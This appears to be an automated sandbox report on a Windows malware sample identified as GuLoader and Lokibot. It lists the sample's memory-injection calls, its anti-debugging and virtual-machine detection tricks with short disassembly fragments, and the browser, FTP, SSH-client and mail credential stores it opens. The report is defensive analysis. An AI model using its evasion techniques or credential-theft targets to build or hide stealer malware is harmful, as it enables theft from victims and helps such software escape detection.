Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A762C1 NtWriteVirtualMemory, 0_2_02A762C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A782DC NtAllocateVirtualMemory, 0_2_02A782DC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7623A NtWriteVirtualMemory, 0_2_02A7623A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7E277 NtSetInformationThread, 0_2_02A7E277
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A76B8F NtWriteVirtualMemory, 0_2_02A76B8F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A76397 NtWriteVirtualMemory, 0_2_02A76397
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A773F6 NtWriteVirtualMemory, 0_2_02A773F6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A763C1 NtWriteVirtualMemory, 0_2_02A763C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A77BC0 NtWriteVirtualMemory,TerminateProcess, 0_2_02A77BC0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A78305 NtAllocateVirtualMemory, 0_2_02A78305
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A77357 NtWriteVirtualMemory, 0_2_02A77357
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7E0CB NtSetInformationThread, 0_2_02A7E0CB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A768DB NtWriteVirtualMemory, 0_2_02A768DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7E016 NtSetInformationThread, 0_2_02A7E016
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A77078 NtWriteVirtualMemory, 0_2_02A77078
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A76843 NtWriteVirtualMemory, 0_2_02A76843
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7E1BC NtSetInformationThread, 0_2_02A7E1BC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A771E7 NtWriteVirtualMemory, 0_2_02A771E7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A761F4 NtWriteVirtualMemory, 0_2_02A761F4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7E16C NtSetInformationThread, 0_2_02A7E16C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A76976 NtWriteVirtualMemory, 0_2_02A76976
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A77143 NtWriteVirtualMemory, 0_2_02A77143
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A766F7 NtWriteVirtualMemory, 0_2_02A766F7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DED7 NtSetInformationThread, 0_2_02A7DED7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A76647 NtWriteVirtualMemory, 0_2_02A76647
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7D64C NtProtectVirtualMemory, 0_2_02A7D64C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DE54 NtSetInformationThread, 0_2_02A7DE54
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A767EC NtWriteVirtualMemory, 0_2_02A767EC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A75709 NtWriteVirtualMemory, 0_2_02A75709
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A76F1F NtWriteVirtualMemory, 0_2_02A76F1F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DF5F NtSetInformationThread, 0_2_02A7DF5F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DC93 NtSetInformationThread, 0_2_02A7DC93
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A764EB NtWriteVirtualMemory, 0_2_02A764EB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A784CF NtAllocateVirtualMemory, 0_2_02A784CF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DCCA NtSetInformationThread, 0_2_02A7DCCA
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A78423 NtAllocateVirtualMemory, 0_2_02A78423
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DC33 NtSetInformationThread, 0_2_02A7DC33
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A76432 NtWriteVirtualMemory, 0_2_02A76432
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A76C6A NtWriteVirtualMemory, 0_2_02A76C6A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7BC75 NtWriteVirtualMemory,LoadLibraryA, 0_2_02A7BC75
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A75D82 NtWriteVirtualMemory, 0_2_02A75D82
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A76582 NtWriteVirtualMemory, 0_2_02A76582
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DDD3 NtSetInformationThread, 0_2_02A7DDD3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DD07 NtSetInformationThread, 0_2_02A7DD07
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A77502 NtWriteVirtualMemory, 0_2_02A77502
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A76D0F NtWriteVirtualMemory, 0_2_02A76D0F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7751A NtWriteVirtualMemory, 0_2_02A7751A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A78577 NtAllocateVirtualMemory, 0_2_02A78577
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7A576 NtWriteVirtualMemory, 0_2_02A7A576
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DD4C NtSetInformationThread, 0_2_02A7DD4C
Detected potential crypto function
PE file contains strange resources
Source: 8rbuJ8Ycv1.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: 8rbuJ8Ycv1.exe, 00000000.00000002.886988620.0000000000435000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIncompr3.exe vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1729045404.0000000002550000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe, 00000010.00000000.886205140.0000000000435000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIncompr3.exe vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1729078192.00000000025A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe Binary or memory string: OriginalFilenameIncompr3.exe vs 8rbuJ8Ycv1.exe
Uses 32bit PE files
Source: 8rbuJ8Ycv1.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@570/3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe File created: C:\Users\user\AppData\Local\Temp\~DF37E05158786A46FB.TMP Jump to behavior
Source: 8rbuJ8Ycv1.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 8rbuJ8Ycv1.exe ReversingLabs: Detection: 41%
Source: unknown Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe' Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_00406636 push ebp; iretd 0_2_00406640
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DA75 push 00000051h; ret 0_2_02A7DA78
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7EB07 push ecx; retf 0_2_02A7EB08
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 16_2_0056EB07 push ecx; retf 16_2_0056EB08
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000002A7C96F second address: 0000000002A7C96F instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000002A708F9 second address: 0000000002A708F9 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000002A71C4A second address: 0000000002A71C4A instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000002A77AC4 second address: 0000000002A77AC4 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000002A76A8A second address: 0000000002A76B31 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor esi, 58A792A8h 0x00000010 test bh, bh 0x00000012 cmp edx, eax 0x00000014 xor esi, 318B51C7h 0x0000001a add esi, 2B3F7621h 0x00000020 test dx, ax 0x00000023 push esi 0x00000024 mov esi, dword ptr [ebp+00000206h] 0x0000002a test dl, cl 0x0000002c mov dword ptr [ebp+00000240h], eax 0x00000032 test ah, FFFFFFD5h 0x00000035 mov eax, 808116E1h 0x0000003a cmp bx, AA3Fh 0x0000003f xor eax, 669D47CFh 0x00000044 jmp 00007F2994B84CF2h 0x00000046 cmp ebx, ecx 0x00000048 add eax, 0060AF4Eh 0x0000004d cmp cl, dl 0x0000004f sub eax, E67D007Bh 0x00000054 test dh, 00000000h 0x00000057 cmp edi, 60808D3Eh 0x0000005d push eax 0x0000005e mov eax, dword ptr [ebp+00000240h] 0x00000064 test esi, F9C4EDE0h 0x0000006a sub edi, 20h 0x0000006d mov dword ptr [ebp+00000202h], ebx 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 pushad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000002A76B31 second address: 0000000002A76BDC instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ebx, dword ptr [ebp+00000202h] 0x00000010 test bh, bh 0x00000012 cmp edx, eax 0x00000014 add edi, 20h 0x00000017 mov dword ptr [ebp+0000023Eh], ecx 0x0000001d mov ecx, edi 0x0000001f push ecx 0x00000020 test dx, ax 0x00000023 mov ecx, dword ptr [ebp+0000023Eh] 0x00000029 test dl, cl 0x0000002b mov dword ptr [ebp+0000023Bh], ecx 0x00000031 mov ecx, 005F6649h 0x00000036 test ah, 00000036h 0x00000039 sub ecx, 2C1083A2h 0x0000003f cmp bx, AC4Fh 0x00000044 xor ecx, A25F7B13h 0x0000004a test ah, ch 0x0000004c sub ecx, 761199B3h 0x00000052 jmp 00007F2994B84CD6h 0x00000054 test bl, al 0x00000056 push ecx 0x00000057 cmp ecx, F5C42B54h 0x0000005d mov ecx, dword ptr [ebp+0000023Bh] 0x00000063 test al, bl 0x00000065 mov dword ptr [ebp+0000010Ch], 00000000h 0x0000006f mov eax, ebp 0x00000071 add eax, 0000010Ch 0x00000076 pushad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000002A76BDC second address: 0000000002A76C00 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001F8h], esi 0x00000010 cmp dl, al 0x00000012 mov esi, eax 0x00000014 push esi 0x00000015 test dl, al 0x00000017 mov esi, dword ptr [ebp+000001F8h] 0x0000001d cmp dx, ax 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000002A77665 second address: 0000000002A77665 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000000568F50 second address: 0000000000568F50 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000000568FB5 second address: 0000000000568FB5 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 00000000005646D1 second address: 00000000005646D1 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 00000000005649A9 second address: 00000000005649A9 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe RDTSC instruction interceptor: First address: 0000000002A7BD5F second address: 0000000002A7BD87 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b nop 0x0000000c test eax, D0AB5031h 0x00000011 cmp bx, bx 0x00000014 test bl, 00000003h 0x00000017 cmp dh, FFFFFFFEh 0x0000001a add esi, 00001000h 0x00000020 cmp eax, ebx 0x00000022 pushad 0x00000023 mov edx, 00000093h 0x00000028 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7423B rdtsc 0_2_02A7423B
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe API coverage: 6.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe TID: 1852 Thread sleep count: 160 > 30
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe TID: 1852 Thread sleep time: -9600000s >= -30000s
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Thread delayed: delay time: 60000
Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7423B rdtsc 0_2_02A7423B
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A78888 LdrInitializeThunk, 0_2_02A78888
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7423B mov eax, dword ptr fs:[00000030h] 0_2_02A7423B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A752EE mov eax, dword ptr fs:[00000030h] 0_2_02A752EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7AAF6 mov eax, dword ptr fs:[00000030h] 0_2_02A7AAF6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A75347 mov eax, dword ptr fs:[00000030h] 0_2_02A75347
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A74E3A mov eax, dword ptr fs:[00000030h] 0_2_02A74E3A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7C70C mov eax, dword ptr fs:[00000030h] 0_2_02A7C70C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A77C8A mov eax, dword ptr fs:[00000030h] 0_2_02A77C8A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7B46E mov eax, dword ptr fs:[00000030h] 0_2_02A7B46E
Enables debug privileges
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp Binary or memory string: Progman
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7E6B0 cpuid 0_2_02A7E6B0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Remote Access Functionality:

Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP